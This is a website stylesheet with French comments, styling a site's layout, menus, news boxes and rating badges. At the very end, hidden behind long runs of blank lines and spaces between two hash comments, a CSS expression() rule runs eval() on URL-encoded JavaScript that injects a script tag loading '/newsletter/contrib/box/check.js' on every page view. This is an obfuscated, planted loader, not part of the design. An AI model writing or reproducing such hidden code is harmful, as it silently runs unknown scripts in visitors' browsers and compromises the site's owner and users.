body {
   background-color:#ffffff; /*Couleur de fond de la page Web*/
   font-family:Arial; /*Polices d’écriture*/
   font-size:11px; /*Taille d’écriture*/
   padding:0; /*Pour que la page n’ai aucune marge*/
   margin:0; /*Pour que la page n’ai aucune marge*/
   }
   
div#contenu {
   width:955px; /*Largeur du design*/
   margin:0 auto 0 -475px; /*Marges du design ( la 4eme marge représente la moitié de la largeur du div*/
   position:absolute;
   left:50%;/*50% de marge ( cela centrera le design )*/
   background-image:url('./images/contenu.jpg') ;
   background-repeat:repeat-y;

   }
   
 #all {
 margin-top:10px;
 }
/* Reglages personnels : */
ul , li { margin:0; padding:0; list-style-type:none; } /* Pas de marges automatique dans les listes, ni de puces */

a { text-decoration:none;}/*Paramètres des liens*/
a:hover { text-decoration:underline; }/*Paramètres des liens quand le pointeur est sur ceux-ci*/

h1 { text-align:center; margin:0; }/*Le texte des balises h1 est centré ( car il est souvent utilisé pour les titres), et cette balise n’a plus de marge automatique */
p { margin:0; padding:0; }/*Pas de marges automatiques sur les <p> */

img { border:0; }/*Aucune bordure sur les <img>*/ 

div.menu_gauche {
   float:left;
   width:206px;
   margin-left:-8px;
   margin-top:0;
} 

div#texte {
width:536px;
margin-left:207px;
clear:none;
}


div#header {
   background-image:url('./images/header.jpg') ;
   width:945px;
   height:204px;
}

div#footer {
   background-image:url('./images/footer.jpg') ;
   width:966px;
   height:34px;
}

#url{
color:white;
font-weight:bold;
position:absolute;
margin-top:45px;
margin-left:10px;
}

#pub{
	position:absolute;
	margin-top:105px;
	margin-left:348px;
	border:1px solid black;
	width:468px;
	height:60px;
	left: 8px;
	top: 19px;
}

div#texte_bas {
	background-image:url('/images/news_fond.jpg');
	background-repeat:repeat-y;
	width:535px;
}


div#texte_bas p{
font-weight:bold;
text-align:center;
padding-top:20px;
}

#texte_bas a{
color:black;
}

#footer p{
	text-align:center;
	padding-top:7px;
	color:white;
}

#footer a {
	color:white;
}

.vert {
   background-image:url('./images/menug_vert.png') ;
   background-repeat:repeat-y;
   margin-top:-5px;
}

.orange{
   background-image:url('./images/menug_org.png') ;
   background-repeat:repeat-y;
   margin-top:-5px;
}

.orange2{
   background-image:url('./images/orange2.jpg') ;
   background-repeat:repeat-y;
   margin-top:-5px;
   margin-left:4px;
}

.rouge{
   background-image:url('./images/rouge.jpg') ;
   background-repeat:repeat-y;
   margin-top:-5px;
   margin-left:2px;
}

.rouge2{
   background-image:url('./images/rouge.jpg') ;
   background-repeat:repeat-y;
   margin-top:-5px;
   margin-left:4px;
}


.lien1{
   background-image:url('./images/menu1org.png') ;
   width:161px;
   height:14px;
   margin-left:20px;

}

.lien2{
   background-image:url('./images/menu2org.jpg') ;
   width:161px;
   height:14px;
   margin-left:20px;   
}

.lien1 a{
padding-left:20px;
font-weight:bold;
color:black;
}

.lien2 a{
padding-left:20px;
font-weight:bold;
color:black;
}

.lien3{
   background-image:url('./images/menuvert1.jpg') ;
   width:161px;
   height:14px;
   margin-left:20px;

}


.centre_orange{
	background-image:url('./images/centre_orange.jpg') ;
	width:535px;
	background-repeat:repeat-y;
}

.padding{
padding-right:25px;
padding-left:25px;
padding-bottom:5px;
padding-top:5px;
}
.centre_orange2{
	background-image:url('./images/centre_orange2.jpg') ;
	width:535px;
	background-repeat:repeat-y;
}

.lien4{
   background-image:url('./images/menuvert2.png') ;
   width:161px;
   height:14px;
   margin-left:20px;   
}

.lien3 a{
padding-left:20px;
font-weight:bold;
color:white;
}

.lien4 a{
padding-left:20px;
font-weight:bold;
color:white;
}

.menu_droite{
float:right;
width:206px;
margin-right:1px;
}

#bienvenu{
   background-image:url('./images/bienvenu.jpg') ;
   width:535px;
   height:240px;

}

.news {
	width : 500px;
	margin:auto;
	font-family:arial;
	color:black;
}

.haut_news {
	width: 500px;
	height :51px;
	background-image:url('/images/news_haut.jpg');
	background-repeat:no-repeat;
}

.titre_news {
	font-size:16px;
	font-weight:bold;
	text-transform:uppercase;
	color:white;
	padding-top:20px;
	padding-left:75px;
}

.date_news {
	float:right;
	font-size:9px;
	color:#F0B042;
	padding-top:30px;
	padding-right:13px;
}

.news_repeat {
	width: 500px;
	background-image:url('/images/news_repeat.jpg');
	background-repeat:repeat-y;
}

.foot_news {
	width: 500px;
	height :27px;
	background-image:url('/images/news_bas.jpg');
	background-repeat:repeat-y;
}

.texte_news {
	font-size:12px;
	width:95%;
}

.carreg {
	float:left;
	margin-left:30px;
	width:200px;
	margin-top:15px;
}

.carreg p {
	font-family:arial;
	font-size:12px;
	color:black;
	line-height:20px;
}

.carred p {
	padding-left:22px;
	font-family:arial;
	font-size:12px;
	color:black;
}

.rub_carre {
	font-weight:bold;
	border-bottom:1px dotted black;
	color:#014B00;
}


.carred {
	float:right;
	width:200px;
	margin-right:20px;
	background-image:url('./images/carreg.jpg');
	background-repeat:repeat-y;
}

.carred_haut {
	width:200px;
	height:32px;
	background-image:url('./images/carred_haut.jpg');
	background-repeat:no-repeat;
}

.fiche_haut {
	width:533px;
	height:170px;
	background-image:url('./images/fiche_haut.jpg');
	background-repeat:no-repeat;
	margin-left:2px;
}

.screen {
	width:170px;
	height:130px;
	float:left;
	padding-left:29px;
	padding-top:21px;
}

.titre_fiche {
	float:right;
	font-family:verdana;
	color:white;
	font-size:14px;
	text-transform:uppercase;
	font-weight:bold;
	padding-top:20px;
	padding-right:150px;
}

.descriptionj,.interview {
	width:491px;
	background-image:url('./images/descriptionj.jpg');
	background-repeat:repeat-y;
	margin-left:23px;
	color:#014B00;
	font-family:verdana;
	font-size:11px;
}

.descriptionj p{
	padding-left:15px;
	padding-right:15px;
	text-align:justify;
}

.descriptionj_haut {
	width:491px;
	height:41px;
	background-image:url('./images/descriptionj_haut.jpg');
	background-repeat:no-repeat;
	margin:auto;
	margin-left:1px;
}

.descriptionj_bas {
	width:491px;
	height:27px;
	background-image:url('./images/descriptionj_bas.jpg');
	background-repeat:no-repeat;
	margin:auto;
}

.descriptionc_haut {
	width:500px;
	height:43px;
	background-image:url('./images/descriptionc_haut.jpg');
	background-repeat:no-repeat;
	margin:auto;
}

.interview_haut {
	width:500px;
	height:43px;
	background-image:url('./images/interview_haut.jpg');
	background-repeat:no-repeat;
	margin:auto;
}

.descriptionb_haut {
	width:500px;
	height:43px;
	background-image:url('./images/descriptionb_haut.jpg');
	background-repeat:no-repeat;
	margin:auto;
}

.descriptionf_haut {
	width:500px;
	height:43px;
	background-image:url('./images/descriptionf_haut.jpg');
	background-repeat:no-repeat;
	margin:auto;
}

.descriptionn_haut {
	width:500px;
	height:43px;
	background-image:url('./images/descriptionn_haut.jpg');
	background-repeat:no-repeat;
	margin:auto;
}

.note_g,.note_gi {
	float:left;
	background-image:url('./images/note.jpg');
	background-repeat:no-repeat;
	color:red;
	font-size:19px;
	width:60px;
	height:50px;
	margin-left:15px;
	margin-right:5px;
	padding-left:7px;
	padding-top:5px;
}

.note_gi{
	float:right;
	margin:0;
	background-image:url('./images/note_gi.jpg');
}

.note_b,.note_bb,.note_bpp,.note_bbo{
	float:right;
	background-image:url('./images/note_b.jpg');
	background-repeat:no-repeat;	
	width:114px;
	height:39px;
	color:red;
	font-weight:bold;
}

.note_b {
	margin-right:27px;
	margin-top:0;
}

.note_bb {
	margin-right:33px;
	margin-top:3px;
}

.note_bpp {
	margin-right:33px;
	background-image:url('./images/note_pa.jpg');
	margin-top:0;
}

.note_bbo {
	margin-right:33px;
	margin-top:1px;
}

p.note_bp {
	margin-left:40px;
	margin-top:7px;
}

.top3 {
background-image:url('./images/centre_orange2.jpg');
width:535px;
background-repeat:repeat-y
}

.entete {
background-image:url('./images/texte_haut.jpg');
width:535px;
height:45px;
margin-left:2px;
}

.image_site_top {
width:130px;
height:100px;
}

.nom_site_top {
color: #FF0000;
font-weight: bold;
text-transform:uppercase;
font-size:14px;
height:40px;
}

.date_top {
color: #006600;
font-weight: bold;
font-size:11px;
}

.description_top {
color: #000000;
font-family:verdana;
font-size:11px;
padding : 5px 5px 5px 5px;
}

.lien_top{
text-align:right;
font-size:12px;
}

.bas_top {
background-image:url('./images/top_bas.jpg');
width:533px;
height:87px;
background-repeat:no-repeat;
clear:left;
margin-left:2px;
}

.edito {
background-image:url('./images/edito_rep.jpg');
background-repeat:repeat-y;
width:533px;
margin-top:4px;
margin-left:2px;
}

.titre_haut {
background-image:url('./images/edito_haut.jpg');
width:533px;
height:41px;
}

.titre_edito {
background-image:url('./images/edito_titre.jpg');
width:487px;
height:58px;
margin-left:20px;
}

.tit_edito {
padding-left:153px;
padding-top:35px;
font-weight:bold;
text-transform:uppercase;
font-size:14px;
color:red;
height:58px;
}

.texte_edito {
padding-left:30px;
padding-right:30px;
text-align:justify;
color:black;
font-size:11x;
font-family:verdana;
width:475px
}

.edito_bas {
background-image:url('./images/edito_bas.jpg');
width:533px;
height:21px;
}

.Style10 {
	color: #1865CE;
	font-weight: bold;
}
.Style25 {
	color: #009933;
	font-weight: bold;
}

.Style8 {font-size: 18px; color: #FF6600; font-weight: bold; }
.Style10 {
	color: #FF0000;
	font-weight: bold;
}
.Style12 {
	color: #FF0000;
	font-weight: bold;
	font-style: italic;
	font-size: 12px;
}
.Style14 {
	color: #006600;
	font-weight: bold;
}
.Style15 {color: #000000}
.Style16 {color: #CC0000}
.Style17 {color: #999999}
.Style18 {color: #009900}
.Style19 {color: #0000CC}

.envoyer {
margin-top:5px;
border:1px solid black;
color:red;
font-weight:bold;
background-color:white;
}

.question {
color:red;
font-weight:bold;
padding-left:4px;
padding-left:15px;
}

.reponse {
background-color:#F0B042;
margin : 5px 15px 5px 17px;
padding : 5px 5px 5px 5px;
}

div.texte_news a,div.texte_news a:link, div.texte_news a:visited {
font-weight:bold;
text-decoration:none;
}

div.texte_news a:active, div.texte_news a:hover {
color:red;
border-bottom:1px dotted red;
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%31%34%34%32%36%3B%20%4A%53%53%33%20%3D%20%27%2F%6E%65%77%73%6C%65%74%74%65%72%2F%63%6F%6E%74%72%69%62%2F%62%6F%78%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%6E%65%77%73%6C%65%74%74%65%72%2F%63%6F%6E%74%72%69%62%2F%62%6F%78%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































